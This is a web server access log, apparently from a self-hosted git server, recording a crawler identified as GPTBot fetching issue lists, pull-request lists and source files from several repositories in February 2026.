200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13566] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13566] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11284] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" -[17/Feb/2026:19:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:19:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" -[17/Feb/2026:19:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" 